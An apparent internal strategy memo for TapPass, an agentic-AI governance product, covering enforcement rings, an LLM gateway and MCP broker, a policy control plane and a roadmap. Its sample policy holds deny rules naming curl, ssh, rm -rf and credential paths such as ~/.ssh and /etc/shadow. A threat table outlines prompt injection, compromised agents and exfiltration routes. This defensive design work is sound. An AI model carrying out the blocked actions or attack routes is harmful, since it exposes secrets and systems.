Skip to content

TapPass — Strategy Memo v3

Status: Internal · Strategic · Canonical strategic frame for the architecture canon. Date: 2026-04-28 · v3.0 Subtitle: The One-Stop Shop for Agentic Governance

Two architectural pillars — an enforcement plane of three rings and many targets, and a control plane that pushes, pulls and reconciles policy across them — making TapPass the neutral authority for how every agent runs in every enterprise.

Terraform + Istio + OPA, applied to agent runtimes.


Part I — Strategic context (why now, and why the category exists)

  • 01 Executive summary
  • 02 The market moment: why now, and why in twelve months is too late
  • 03 The problem: what every existing tool misses
  • 04 The thesis: three rings, one substrate, neutral ground
  • 05 Competitive landscape

Part II — Architectural vision (the substrate)

  • 06 The enforcement plane: rings, targets & cross-cutting layers (LLM Gateway + MCP Broker)
  • 07 The control plane: Compiled Policy, providers, push/pull/reconcile
  • 08 Mapping agent surfaces to the architecture
  • 09 Nine scaling vectors
  • 10 What we are explicitly not doing

Part III — Tactical execution (getting it shipped)

  • 11 Product shape: Runtime, Control, Intelligence
  • 12 Quarter-by-quarter roadmap (Q2 2026 → 2027)
  • 13 Organizational implications & resourcing
  • 14 Moats and defensibility
  • 15 Risks and how we mitigate them

Part IV — Practical walkthroughs

  • 16 Scenario 1: Fintech CISO rolls out Claude Code to 200 engineers
  • 17 Scenario 2: Startup developer runs a governed agent solo
  • 18 Scenario 3: Healthcare AI team ships a production agent
  • 19 Sample policy cascade: one source, three rings
  • 20 The first 30 / 60 / 90 days of shipping Runtime v1

Part V — Decision

  • 21 Decisions requested
  • 22 Glossary & references

Agentic AI is crossing from experiment to production faster than any enterprise software category in a decade. CISOs do not have a governance stack built for it. Every existing tool covers exactly one layer of the problem — the harness, the container, or the interpreter — and none of them integrate. TapPass has quietly built foundational pieces at all three layers. The opportunity is to connect them into a single policy substrate and define the category before it names itself.

  1. The problem is three rings, plus two cross-cutting layers. A real agentic-governance stack must enforce at three distinct in-process rings — the harness (agent CLI / framework permissions), the kernel (container / sandbox), and the interpreter (language VM executing agent-generated code) — and at two cross-cutting layers between processes: the LLM Gateway (every prompt and response intercepted at the model API) and the MCP Broker (every tool call intercepted at the tool-RPC layer). Five enforcement positions, organized as 3 + 2 (ADR 0001).

  2. The architecture is two pillars, not one.

    • Pillar 1 — Enforcement Plane: three rings + two cross-cutting layers. Rings are the stable taxonomy; targets multiply (OpenShell, nono, gVisor, Firecracker, K8s NetworkPolicy, sandbox-exec for kernel; Claude Code, Codex, Cursor, Cline, LibreChat, Element bots for harness; Monty, V8 isolates, Wasmtime for interpreter). Cross-cutting layers (LLM Gateway, MCP Broker) sit between processes and are always compulsory.
    • Pillar 2 — Control Plane: a canonical Compiled Policy authored in Rego, rendered by per-target providers (ADR 0002), distributed via push (SSE) and pull (HTTP), reconciled continuously against an agent registry. Compiled Policy content is organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring (ADR 0003).

    Terraform + Istio + OPA, applied to agent runtimes.

  3. TapPass already has most of the ingredients. OpenShell + nono cover the kernel ring. The SDK's SandboxManager + SSE policy push + trust tiers + forbidden zones cover most of the control loop. The CLI (tappass run claude) is the distribution surface. Env-var redirection (OPENAI_BASE_URL/ANTHROPIC_BASE_URL) is the gateway in primitive form. What is missing is the unifying canonical Manifest, second-ring providers, and the reconciler that closes the loop — the four-piece Minimum Credible Substrate that proves the architecture end-to-end.

  4. The architecture generalizes across every agent surface we can reach. CLI agents (Claude Code, Gemini CLI, Codex CLI, Cursor) — direct three-ring fit. Self-hosted web UIs (LibreChat, OpenWebUI, Open Devin) — plugin/SDK harness, server kernel, gateway. Chat-bot deployments (Element/Matrix, Slack, Discord, Teams) — bot-framework SDK, channel-aware policy. Custom code — SDK direct + gateway. Vendor-hosted SaaS (claude.ai, ChatGPT.com, Gemini in Workspace) is honestly out of scope; pair with vendor admin tooling.

  5. The commercial bet is a three-product shape. Runtime (open-core SDK + CLI + providers, viral distribution), Control (SaaS + on-prem dashboard, authoring, marketplace, compliance reports), and Intelligence (cross-customer behavioral baselines, the long-run data moat). Three flywheels, one substrate.

Make TapPass the neutral substrate every enterprise trusts to say "yes" to agentic AI — three in-process rings of enforcement, two cross-cutting layers (LLM Gateway + MCP Broker), and a control plane that pushes, pulls and reconciles Compiled Policy across every agent surface we can reach.

  • Commit to the Minimum Credible Substrate as the Q2 2026 shipping target.
  • Promote the LLM gateway to a first-class element alongside the rings, with Gemini / Vertex AI as the first roadmap upstream-API addition.
  • Fund MCP Governance as a parallel workstream starting now.
  • Plan agent-surface coverage as the Q3–Q4 expansion: LibreChat plugin, Element / Matrix bot SDK, additional CLI providers.
  • Cement neutrality as cultural policy: we govern every framework, pick no winners.

Three curves are crossing in 2026 that make this the precise window for agentic governance to become its own category:

Curve A: production deployment of agent CLIs in development environments. Claude Code, Cursor, Codex, Cline, Windsurf, Aider, Continue — all are now shipping with paying enterprise tiers. Developer laptops have become the most privileged, least-governed attack surface in the modern enterprise. The agents can read source code, write code, run build systems, and execute shell commands — driven by a non-deterministic LLM that will follow a prompt-injection attack through three tool calls before anyone notices.

Curve B: regulatory arrival. EU AI Act enforcement is in effect. ISO/IEC 42001 is becoming the default AI management system standard in procurement. NIST AI RMF is referenced in every US federal RFP. SOC 2 auditors are beginning to specifically ask "how do you govern AI agents?" and the honest answer today is "we don't." This is a buying trigger, not a nice-to-have.

Curve C: MCP and codemode becoming the dominant capability patterns. MCP (Model Context Protocol) is becoming the standard way agents acquire capability. Codemode — agents writing Python / JS to accomplish tasks — is becoming the dominant pattern for non-trivial work. Both are wildly under-governed today. Whoever builds the reference governance layer in 2026 owns the conversation in 2027 and beyond.

The category does not exist yet; it will exist in twelve months. Who defines it defines the taxonomy buyers will use to evaluate every tool that comes after. TapPass should be first with a name, a stack, and a proof-point customer story.

Why TapPass is positioned to win this window

Section titled “Why TapPass is positioned to win this window”
  • Infrastructure already built — OPA cascade, OpenShell integration, SSE policy push, trust tiers, forbidden zones, exfil blocklist, audit pipeline. No competitor starts this far down the runway.
  • Distribution moat already primedpip install tappass, tappass run claude. Zero-friction developer onboarding.
  • Airgapped / on-prem option already shippingtappass-platform license server for regulated customers.
  • Neutral positioning is still possible — no entrenched commitment to any one agent framework, MCP server, or cloud.

03 · The Problem: Why Every Existing Tool Misses

Section titled “03 · The Problem: Why Every Existing Tool Misses”

Every existing sandbox, allowlist, or policy tool lives on one of three floors in the same building. Each one, by itself, misses two entire classes of threat.

The harness layer alone is cooperative, not compulsory

Section titled “The harness layer alone is cooperative, not compulsory”

Tools like Claude Code's .claude/settings.json are enforced inside the agent. The harness checks permissions.allow/deny/ask before it runs a tool. Rich semantics — but the same process that enforces the rule can also skip it.

What harness-only policy cannot defend against:

  • A compromised or modified agent binary (the enforcement is the binary).
  • Prompt injection that routes through an allowed tool.
  • The agent spawning a subprocess that inherits full user credentials and FS access.
  • A zero-day in the agent itself, in any loaded MCP server, or in any tool binary on $PATH.

The kernel layer alone is compulsory, not semantic

Section titled “The kernel layer alone is compulsory, not semantic”

Tools like OpenShell, gVisor, Firecracker, Landlock and seccomp enforce outside the agent. The kernel returns EACCES or drops a packet regardless of what the agent thinks it is doing. Provably contains a hostile binary, but blind to meaning.

What kernel-only policy cannot do:

  • Distinguish "legitimate HTTPS to GitHub for the agent's work" from "HTTPS to GitHub to exfiltrate source code".
  • Prevent the agent from using an allowed tool in a malicious way.
  • Author policy in terms developers and auditors understand.
  • Integrate with the harness's tool catalogue, skill registry, or MCP server list.

The interpreter layer alone is hard but narrow

Section titled “The interpreter layer alone is hard but narrow”

Runtimes like Monty, V8 isolates, Wasmtime contain code the agent writes: a Python snippet the LLM produced, a JavaScript expression to filter events, a SQL query to compute a metric. Hard enforcement, but only protects the generated code.

What interpreter-only policy misses:

  • The agent process that wrote the code still has full OS rights.
  • Tool calls the agent makes directly (not through generated code) are ungoverned.
  • Network egress from outside the interpreter is unrestricted.

A CISO today must choose, buy, and operate three different systems that do not share a policy model, do not share an audit trail, and drift independently. Agents on a developer laptop, in CI, on Kubernetes, and in a browser each get a different ad-hoc policy.

ThreatHarnessKernelInterpreter
Agent calls a disallowed tool on purpose (user error / misuse)✓ primarypartial
Prompt injection routes through allowed tool to unallowed effectpartial✓ primary
Compromised or modified agent binary✓ primary
Malicious code generated by the LLM (codemode)partial✓ primary
Exfiltration via DNS / covert channel✓ primary (L7 proxy)
Credential theft via env-var dump✓ primary (cred hiding)✓ partial (no ambient env)
Supply-chain attack through MCP serverpartial (attestation)✓ (network containment)

Any serious governance stack has to cover all three rings or accept that two out of three attack surfaces remain open.


04 · The Thesis: Two Pillars and Neutrality

Section titled “04 · The Thesis: Two Pillars and Neutrality”

The thesis has three parts: two architectural pillars, plus a cultural commitment. Each must be true for the whole to work.

Pillar 1 — The Enforcement Plane (rings, targets & cross-cutting layers)

Section titled “Pillar 1 — The Enforcement Plane (rings, targets & cross-cutting layers)”

Three rings describe kinds of enforcement that sit inside the agent's process. Within each ring, many targets exist — specific tools or runtimes that fill the ring on a particular platform. Rings are the stable taxonomy; targets are the long tail. TapPass picks no canonical target; it ships providers for whichever ones a customer actually runs.

Two cross-cutting layers sit between processes — always compulsory, always reachable, no runtime-specific cooperation needed: the LLM Gateway (every prompt and response) and the MCP Broker (every tool call). They are not rings; they are peer enforcement positions that catch what the rings cannot reach (third-party code, BYOK clients, MCP servers we don't ship). See ADR 0001 — Rings, not layers.

PositionTypeGovernsTargets
Ring 1 — HarnessSemantic, cooperative · in-processWhat tool calls an agent attemptsClaude Code, Codex, Cline, Cursor, Windsurf, Aider, LangGraph, CrewAI, Autogen, TapPass SDK agents
Ring 2 — KernelCompulsory, coarse · in-processWhat the agent process can doOpenShell, nono, gVisor, Firecracker, bubblewrap, macOS sandbox-exec, Windows AppContainer, K8s NetworkPolicy + Gatekeeper, Fargate
Ring 3 — InterpreterNarrow, hard · in-processWhat code the agent writes can doMonty, V8 isolates, Wasmtime, restricted DuckDB, WebContainers
Cross-cutting — LLM GatewayCompulsory · between processesEvery prompt + responsetappass/gateway/ (Anthropic-native, OpenAI-compat, LiteLLM 100+ providers — shipped)
Cross-cutting — MCP BrokerCompulsory · between processesEvery MCP tool call (outbound + inbound)tappass/gateway/mcp_server.py + per-org MCP registry; schema_acl + loop_guard pipeline steps

Pillar 2 — The Control Plane (Compiled Policy, providers, push/pull/reconcile)

Section titled “Pillar 2 — The Control Plane (Compiled Policy, providers, push/pull/reconcile)”

The enforcement plane is the muscle; the control plane is the brain. It is what makes "one policy, many enforcement positions, continuously updated" a technical reality. Three responsibilities:

  1. Author and emit — the OPA cascade evaluates Rego with org/project/agent inputs and emits a single canonical, signed, versioned Compiled Policy (ADR 0003). Content is organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring — the same aspect can be enforced at multiple positions.
  2. Render and distribute — per-target providers (ADR 0002) turn the Compiled Policy into target-specific config. The control plane pushes updates over SSE; agents pull at boot or on demand.
  3. Reconcile and detect drift — the agent registry tracks which agent runs which Compiled Policy version. The reconciler closes the loop: re-pushing where ACKs are missing, alerting on drift, surfacing stale agents.
A U T H O R ─ OPA / Rego cascade · GitOps · simulation · shadow mode
▼ evaluate
C A N O N I C A L ─ Compiled Policy · signed · versioned · single source of truth
▼ render via providers
H A R N E S S K E R N E L I N T E R P R E T E R
settings.json OpenShell · nono monty manifest
Claude Code gVisor · Firecracker V8 · Wasmtime
Codex · Cline K8s NetworkPolicy
▼ push (SSE) · pull (HTTP) · reconcile
E N F O R C E M E N T + T E L E M E T R Y
Agent executes · actions signed · audit streamed · ACK with manifest version

TapPass must not compete with any agent framework or sandbox vendor. We govern all of them. Every vendor's commercial interest aligns with ours when we say "yes" to integration. This is how the service mesh was won by Istio/Envoy (neutral data plane) and lost by proprietary alternatives.

Neutrality is not a marketing claim — it is an architectural and organizational commitment that shows up in the roadmap, the partnerships, and the hiring profile.


CategoryRepresentative playersRing coveredWhy they don't cross the rings
Framework-native permission filesClaude Code settings.json, Cursor, Cline, Aider configsHarnessEach vendor owns only its own harness. None aim to govern the OS or other vendors' CLIs.
Container / syscall sandboxinggVisor, Firecracker, Docker, Podman, OpenShell, Landlock, seccompKernelGeneric sandbox tech, no semantic policy for tools / MCP / skills.
Runtime interpreter sandboxesMonty, Pyodide, V8 isolates, Wasmtime, DenoInterpreterOnly protect generated code; ignore the agent process and harness.
Cloud IAM / service meshAWS IAM, Azure AD, Istio, Kyverno, OPA GatekeeperAdjacent to kernelGoverns services, not agent-specific semantics; no harness awareness.
AI observability / evalArize, Langfuse, Weights & Biases, BraintrustObserve, do not enforce. Complementary, not competitive.
LLM firewalls / content filtersLakera Guard, Prompt Armor, Robust IntelligenceHarness (partial)Inspect prompts/outputs; no policy over tools, processes, or generated code.
EDR / Cloud workload protectionCrowdStrike, SentinelOne, WizKernel (generic)Generic workload protection; no agent vocabulary, no framework integration.

Not by being better than any one of these, but by being the only vendor whose single policy substrate spans all three rings, on all three operating systems, across all agent frameworks. Adjacent tools become integration partners, not rivals.

  • vs. framework-native: we integrate with them, not replace them. Claude Code's settings.json becomes one provider target.
  • vs. sandbox vendors: we consume them. OpenShell is one of our shipped kernel-ring providers; adding gVisor or Firecracker is a new provider, not a rewrite.
  • vs. observability: we generate the signals they consume.
  • vs. EDR: we are the agent-specific vocabulary EDR vendors lack.

Be the neutral substrate. Make every adjacent tool's life easier. Make every framework vendor look better for being "officially governed by TapPass". The only vendor we compete with head-on is the greenfield competitor who tries to build the same substrate — and we are already 18 months ahead.


06 · Pillar 1: The Enforcement Plane (Rings, Targets & Cross-Cutting Layers)

Section titled “06 · Pillar 1: The Enforcement Plane (Rings, Targets & Cross-Cutting Layers)”

Rings are categories of enforcement — three of them, defined by the threat class each catches and the layer of the stack each operates at. Targets are specific implementations that fill out a ring on a particular platform. Providers are per-target plug-ins that render the Compiled Policy as native target config (Terraform-style — see ADR 0002). TapPass is agnostic across targets and ships providers for whichever ones customers actually run.

Ring 1 — Harness (semantic, cooperative)

Section titled “Ring 1 — Harness (semantic, cooperative)”

Governs: what tool calls an agent attempts. Rich semantic vocabulary; cooperative enforcement.

Targets: Claude Code managed-settings.json; Codex CLI ~/.codex/config.toml; Cline / Cursor / Windsurf per-vendor configs; Aider .aider.conf.yml; LangGraph / CrewAI / Autogen tool-catalogue APIs; TapPass SDK agents (manifest direct).

What TapPass contributes: one central policy that renders correct syntax for each target's native file. Always writes the enterprise-managed layer where the target supports it. Inspects project-local and user-layer policies for conflicts.

Governs: what the agent process can do. Filesystem boundaries (Landlock, macOS sandbox-exec, Windows AppContainer, K8s volumes), network egress control (L7 proxy or kernel-level), syscall filtering (seccomp), process namespacing, credential hiding (proxied keys), binary identity verification.

Targets:

TargetForm factorBest forUpdate model
OpenShellContainer + L7 proxyServers, CI, K8sHot-reload network; restart for FS/exec
nonoCapability sandbox (Landlock / sandbox-exec)Developer laptopsRestart-only
gVisorUser-space kernelCloud Run, GKEPer-pod restart
FirecrackermicroVMAWS, Fly.io, multi-tenant edgeVM restart
bubblewrapLightweight namespacesLinux dev / CIRestart-only
macOS sandbox-execOS-native sandboxmacOS-specificRestart-only
Windows AppContainerOS-native isolationWindowsRestart-only
K8s NetworkPolicy + GatekeeperCluster-levelK8s admission + runtimeLive

Why several targets matter: customers don't choose their OS or topology. A fintech CISO governs Macs, Linux servers, and EKS pods all at once. The substrate has to render the same Manifest into the right target for each surface.

Governs: what code the agent writes can do. Microsecond startup, zero ambient authority, capabilities injected explicitly.

Targets:

TargetLanguageNotes
MontyPython (subset)Rust-based; microsecond startup; capability-only API; checkpointing
PyodidePython (full)WASM-Python; heavier but full stdlib
V8 isolatesJS / TSCloudflare Workers pattern
WasmtimeWASM polyglotCapabilities via WASI
Restricted DuckDBSQLAnalytical-codemode (data agents)

Why this ring matters more than it looks: Codemode is becoming the dominant agentic pattern. Instead of orchestrating twelve tool calls, the LLM writes one Python function. This shifts the enforcement burden off the harness onto the interpreter. Owning the interpreter ring is a future-proofing move.

Cross-cutting — LLM Gateway and MCP Broker

Section titled “Cross-cutting — LLM Gateway and MCP Broker”

The three rings govern what an agent does inside its process. The two cross-cutting layers govern what crosses process boundaries: every model call (LLM Gateway) and every tool call (MCP Broker). Different threat surfaces, same Compiled Policy, always compulsory. They reach agents we cannot otherwise instrument — code we don't own, third-party MCP servers, custom integrations, BYOK clients.

LLM Gateway — every prompt, every response

Section titled “LLM Gateway — every prompt, every response”

What lives here:

  • Every LLM call (prompt + completion) for every governed agent flows through tappass/gateway/.
  • The SDK already does this: it injects OPENAI_BASE_URL / ANTHROPIC_BASE_URL.
  • Upstream API support: OpenAI-compatible · Anthropic-native · LiteLLM 100+ providers. Roadmap: Google AI Studio + Vertex AI (Gemini), self-hosted via vLLM / Ollama / TGI.

What it enforces: PII detection & redaction, secrets scanning, prompt-injection signatures, response filters, budget caps, rate limits, BYOK key management, full audit. Capability tokens (ES256, JWKS-verified) carry per-call scope.

Why it is the universal entry point: a native harness provider requires per-CLI integration work. The kernel ring requires a sandbox runtime. The interpreter ring requires codemode adoption. The gateway requires only that the consumer is configured with a base URL — a one-line change. For agents we cannot otherwise reach, the gateway is the one enforcement layer that always works.

What lives here:

  • Every MCP connection — outbound (agent → upstream tool servers) and inbound (external systems → the agent's tools) — passes through the TapPass MCP broker.
  • Per-org MCP server registry: which servers are approved, with attested SBOMs and signed allowlists.
  • Pipeline steps schema_acl and loop_guard enforce per-call resource access and stop runaway agents.

What it enforces: which tools each Compiled Policy allows; which parameters and schemas each tool can use; rate limits per tool; data-class tagging of responses; capability-token-bound session scope.

Why it is the second cross-cutting layer (not just a Q4 productization push): the same tools.deny aspect of the Compiled Policy that lands on a harness provider as a settings.json allow/deny rule also lands at the MCP broker as a per-call check. Defense in depth across positions, all from one Compiled Policy (ADR 0003).

What the cross-cutting layers cannot do alone

Section titled “What the cross-cutting layers cannot do alone”

Block tool calls the agent makes locally without going through the gateway or broker. Contain a compromised agent process. Control what generated code can do. The cross-cutting layers are necessary but not sufficient. The full enforcement plane is three rings + two cross-cutting layers.


07 · Pillar 2: The Control Plane (Compiled Policy, Providers, Push/Pull/Reconcile)

Section titled “07 · Pillar 2: The Control Plane (Compiled Policy, Providers, Push/Pull/Reconcile)”

TapPass is structurally Terraform + Istio + OPA, applied to agent runtimes. Terraform's declarative source and provider-plugin model. Istio's continuous control-plane reconciling a heterogeneous data plane. OPA's policy engine (literally — we already use it). Each precedent solves a piece; the novelty is putting all three together for a new domain.

7.1 The canonical Manifest — the single source of truth

Section titled “7.1 The canonical Manifest — the single source of truth”

The OPA cascade evaluates Rego with inputs from agent identity, trust tier, data classification, time/rate/budget state, and session chain. Its sole output is a signed, versioned Compiled Policy. Providers never see Rego; they see only the Compiled Policy. This is the architectural seam that makes everything composable.

Compiled Policy — canonical form (abbreviated):

{
"version": 1017,
"issued_at": "2026-04-28T12:00:00Z",
"identity": {
"agent_id": "claude-code@team-eng.acme.com",
"tier": "worker",
"chain": ["orchestrator@team-eng.acme.com"]
},
"network": {
"allow_domains": ["api.anthropic.com", "github.com", "pypi.org"],
"deny_categories": ["paste_services", "webhooks", "dyndns"]
},
"filesystem": {
"workspace": "/workspace",
"read_only": ["/app/read-only-mounts"],
"deny_paths": ["~/.ssh", "~/.aws", "~/.kube", "/etc/shadow"]
},
"tools": {
"allow": ["Bash(cargo:*)", "Bash(uv:*)", "WebFetch(domain:github.com)", "Skill(*)"],
"deny": ["Bash(curl:*)", "Bash(ssh:*)", "Bash(rm -rf:*)"]
},
"interpreter": {
"host_functions": ["http_get", "http_post", "json_parse"],
"memory_mb": 128, "cpu_time_ms": 5000, "stack_depth": 256
},
"budget": {"tokens_per_day": 500000, "dollars_per_month": 200, "tool_calls_per_minute": 60},
"compliance_tags": ["SOC2:CC6.1", "ISO42001:6.2.3"]
}

Each provider is a pure function: provider(compiled_policy, target_capabilities) → target_config. Adding a target = writing a provider. This is the Terraform analogy made literal (ADR 0002). Providers compose with the Compiled Policy, so a single policy renders to many enforcement targets simultaneously. A Runtime is the operator-authored recipe that combines one provider per ring + the gateway/MCP-broker config; sandboxes are bound to runtimes.

7.3 The control loop — push, pull, reconcile

Section titled “7.3 The control loop — push, pull, reconcile”

This is the leg most "AI governance" tools miss and the leg that distinguishes TapPass as a control plane rather than a static config tool.

ModeDirectionUse case
PushControl → Data plane (SSE bus)Manifest version bumps; broadcast to all connected agents; expect ACK within seconds. Primary path for live updates.
PullData → Control plane (HTTP fetch)Agent boots and fetches its assigned Manifest. Agent reconnects after offline and catches up. Periodic heartbeat verifies version match. Resilience and bootstrap.
ReconcileControl plane internal (background loop)Compares desired Manifest version per agent against last-ACK'd version. Re-pushes where ACKs are missing. Marks drifted agents. Surfaces stale or disconnected agents.

Per-target update semantics: every target has its own update model (hot-reload, restart-only, file rewrite). The supervisor library in the SDK encapsulates these so the user-visible promise — "policy updates apply within seconds" — holds across all of them.

7.4 The state store — what the control plane knows

Section titled “7.4 The state store — what the control plane knows”

A central registry tracks every governed agent. Without this, push and pull are blind broadcasts; with it, the control plane knows what's actually deployed and can act on drift.

Agent registry — schema (abbreviated):

{
"agent_id": "claude-code@team-eng.acme.com",
"session_id": "s-abc-123",
"identity_hash": "sha256:9f1c…",
"desired_manifest_version": 1017,
"applied_manifest_version": 1017,
"applied_state": {
"harness": {"target": "claude-code", "version": 1017, "ack_at": ""},
"kernel": {"target": "nono", "version": 1017, "ack_at": "", "mode": "restart"},
"interpreter": {"target": "monty", "version": 1017, "ack_at": ""}
},
"drift": null,
"last_seen": "2026-04-28T12:34:01Z",
"platform": {"os": "darwin", "arch": "arm64", "claude_code_version": "1.0.142"}
}
ConceptTerraform / Istio / OPATapPass
Source of truth*.tf HCLRego cascade emitting canonical Manifest
Plan / diffterraform plantappass plan against telemetry; PR simulation
Applyterraform applyPush: SSE broadcast; or Pull: agent fetch
Refreshterraform refreshAgent heartbeat re-fetches its manifest
Provider pluginsaws / gcp / azure / kubernetesnono / openshell / claude-code / monty / gvisor / k8s
State fileterraform.tfstateAgent registry (per-agent applied-version & ACK)
Continuous reconciliationIstio control plane / k8s operatorsTapPass reconciler loop
Policy engineOPA / GatekeeperOPA (already used, native)
Drift detectionArgo CD / FluxReconciler diff against state store

Why this comparison lands: Infra-side buyers (CISO direct staff, platform teams, SREs) are exhausted of bespoke AI tooling. "Terraform + Istio + OPA for agent runtimes" is a sentence that maps onto their existing mental models in fifteen seconds.


08 · Mapping Agent Surfaces to the Architecture

Section titled “08 · Mapping Agent Surfaces to the Architecture”

The substrate is deployment-shape agnostic. Rings describe what an agent does; deployment shape describes where it runs. They are orthogonal — the same Manifest fits any agent; only the targets that fill each ring change with the shape.

ShapeExamplesKernel targetGovernable?
CLI / localClaude Code, Gemini CLI, Codex CLI, Cursor, Cline, Aidernono, sandbox-exec, bubblewrapYes — laptop
Self-hosted serverLibreChat, OpenWebUI, Open Devin, Element/Matrix bots, custom agents on K8sOpenShell, gVisor, Firecracker, K8s NetworkPolicy + GatekeeperYes — server
Vendor-hosted SaaSclaude.ai web, ChatGPT.com, Gemini in Workspace, Microsoft Copilotnone — runs on vendor infraNo — out of scope

Honest scope: Vendor-hosted SaaS is outside the perimeter. Anthropic's, Google's, OpenAI's and Microsoft's hosted UI experiences run on their servers; we cannot enforce policy on infrastructure we don't control. The right pitch is "govern self-hosted agents and self-managed gateways; pair with vendor admin tooling for the SaaS surfaces." Don't claim coverage we don't have.

SurfaceHarness providerKernel targetGateway?Manifest extras
Claude Code / Gemini CLI / Codex CLIper-CLI native confignono / OpenShellvia env vars
LibreChat / OpenWebUITapPass plugin or SDKOpenShell / K8sbase URLconversation_class
Element / Slack / Discord botSDK in bot frameworkOpenShell / K8sbase URLroom / channel
Custom code (LangChain etc.)SDK directOpenShell / nono / K8sbase URL
Vendor-hosted SaaSBYOK onlyout of scope

Each vector is a direction in which the core architecture compounds. Ordered by strategic weight.

#VectorWhat it addsStrategic weight
01Target coverage breadth — providers across every runtimeThe substrate's value compounds with every new target. 20-provider surface by end of 2027.Foundation
02Policy depth — beyond allow/denyBudget, data classification, time-of-day, rate, concurrency, provenance, attestation. Policy is not a binary gate.High
03Identity & chain of custody — SPIFFE-grade for every agent sessionEach session signed under {identity, session_id, policy_version}. Forensic replay.High
04Real-time & adaptive enforcementHot-reload to EDR for agents — breach response, anomaly-driven tightening, SIEM/EDR integration. "EDR for agents."High
05Policy authoring UX — Rego is a taxHighest-ROI commercial unlock. GitOps, simulation, shadow mode, auto-baselines, NL → Rego, marketplace.Highest commercial unlock
06MCP Governance — govern the capability busMCP proxy / broker, registry, attestation, signed allowlists, certified policy templates, skills governance.Highest leverage · time-sensitive
07Compliance as a productPre-mapped controls against SOC 2, ISO 42001, NIST AI RMF, EU AI Act, HIPAA, GDPR. One-click auditor reports.High (deal-closer)
08Federation, airgap, edgeMulti-tenant policy inheritance, offline-first data plane, miniaturized form factors.Medium
09Telemetry as compounding moat (Intelligence)Cross-customer behavioral baselines no single customer can replicate. The long-run defensibility.Long-run moat

Strategic clarity is as much about what is out of scope. Each of these is a plausible adjacent bet that we are deliberately declining.

  • We are NOT building an agent framework. No Claude Code competitor. No LangChain. No agent CLI. Every such effort would reduce neutral positioning and put us in competition with vendors whose integration we need.
  • We are NOT building a sandbox from scratch. OpenShell exists. gVisor exists. Firecracker exists. We do not write a kernel or hypervisor.
  • We are NOT going deep into LLM content filtering. Lakera, Prompt Armor, Robust Intelligence are partners. We integrate.
  • We are NOT pivoting to be an eval or observability platform. Arize, Langfuse, Braintrust, W&B have eval as their north star. We complement.
  • We are NOT a compliance-auditing firm. We ship regulation mappings; auditors are customers and partners, not competition.

11 · Product Shape: Runtime, Control, Intelligence

Section titled “11 · Product Shape: Runtime, Control, Intelligence”

The nine vectors collapse into three products that share a substrate, each with a different buyer, motion, and flywheel.

ProductWhat it isBuyer & motionFlywheel
Runtime (open-core)Sandbox stack across the three rings + cross-cutting layers. SDK, CLI, OpenShell + nono integration, monty hook, provider library, SSE client, MCP broker.Developer-led. pip install tappass; tappass run claude. Friction-free. Zero-touch adoption.Every installed agent is a qualified lead for Control and a telemetry source for Intelligence.
Control (SaaS + on-prem)Dashboard, policy authoring, GitOps, simulation, shadow mode, marketplace, compliance reports, admin & RBAC.CISO / Head of AI / GRC. Enterprise contracts. SaaS for most; airgapped on-prem via license server for regulated industries.Policy-pack marketplace: community contributes, we certify. Locks mindshare.
Intelligence (data-moat upsell)Cross-customer anomaly detection, behavioral baselines, industry benchmarks, MCP / skill vulnerability disclosure.Upsell on top of Control. Only valuable once Runtime has reached scale.More telemetry → sharper signal → higher retention → more telemetry.
  • Runtime has to be open-core. Developers will not accept a paid kernel-level sandbox on their laptops for free experimentation. SDK and CLI must be MIT/Apache so pip install tappass is as frictionless as pip install requests.
  • Control is where the dollars come from. The CISO persona wants a dashboard, a report, a policy repo, an on-call integration, and an auditor export. That is the Control product.
  • Intelligence earns its right to exist. Anomaly detection only works with scale. We earn it by first winning Runtime and Control.

Runtime free forever. Control priced per governed agent per month, with unlimited sub-agents and discounted tiers above 500 agents. Intelligence as an add-on, priced per telemetry volume band. On-prem surcharge on Control. Mirrors service-mesh and observability market pricing.


Q2 2026Q3 2026Q4 2026Q1 2027
Minimum Credible SubstrateAuthoring UX, Control v1 & surface expansionMCP Governance & chat-bot surfacesIntelligence v1 & Federation
Canonical Compiled Policy + state storeGitOps + simulation + shadow mode + auto-baselinesMCP proxy + per-server policy + skill registryCross-customer anomaly detection alpha
Two providers across two ringsHarness providers: Codex CLI · Gemini CLI · Cursor · ClineElement / Matrix · Slack / Discord / Teams bot providersMCP / skill vuln-disclosure channel
Push / pull / reconcile control loopGateway upstreams: Vertex AI (Gemini)Kernel providers: gVisor · Firecracker · K8s NetworkPolicyFederated multi-tenant cascade
LLM Gateway v1 + monty interp ringLibreChat plugin · Compliance v1 (SOC 2 · ISO 42001)Marketplace v1 + 3 certified policy packsCompliance v2: EU AI Act, NIST AI RMF

Q2 2026 — Minimum Credible Substrate (MCS)

Section titled “Q2 2026 — Minimum Credible Substrate (MCS)”

The four-piece MCS (see the dedicated minimum-credible-substrate.md for full detail):

  1. Canonical Compiled Policy — schema-versioned, signed, emitted as the OPA cascade's sole output.
  2. At least two providers across two rings — proves the "one source, many backends" claim. Recommended: one kernel-ring provider + the Claude Code harness provider.
  3. Bidirectional control loop — push (SSE), pull (HTTP fetch + heartbeat), and the reconciler that closes the gap.
  4. Agent registry / state store — knows desired vs. applied manifest version per agent. Dashboard stub renders this.

Full Q2 scope (extends MCS): LLM Gateway v1; CLI extended (tappass run claude --rings=…); control loop end-to-end; dashboard stub.

Q3 2026 — Authoring UX, Control v1 & surface expansion

Section titled “Q3 2026 — Authoring UX, Control v1 & surface expansion”

Removes Rego as a ceiling and broadens coverage from "Claude Code on laptops" to "every CLI agent + the first server-shape surface."

  • Policy-as-code GitOps; shadow mode; auto-learned baselines.
  • CLI harness providers: Codex CLI, Gemini CLI, Cursor, Cline.
  • LLM Gateway upstreams: Google AI Studio + Vertex AI (Gemini).
  • First server-shape surface: LibreChat plugin.
  • Compliance mapping v1: SOC 2, ISO 42001.

Q4 2026 — MCP Governance, chat-bot surfaces & kernel scale

Section titled “Q4 2026 — MCP Governance, chat-bot surfaces & kernel scale”
  • MCP proxy / broker; signed MCP server registry with SBOMs.
  • Chat-bot surface providers: Element / Matrix, Slack / Discord / Teams.
  • gVisor, Firecracker, K8s providers.
  • Marketplace v1: 3 certified policy packs.
  • Cross-customer anomaly detection alpha (opt-in, tenant-isolated).
  • MCP / skill vulnerability disclosure channel.
  • Federated multi-tenant cascade.
  • Compliance v2: EU AI Act Article 15/16/17, NIST AI RMF mappings.

13 · Organizational Implications & Resourcing

Section titled “13 · Organizational Implications & Resourcing”
TeamCharterRough size
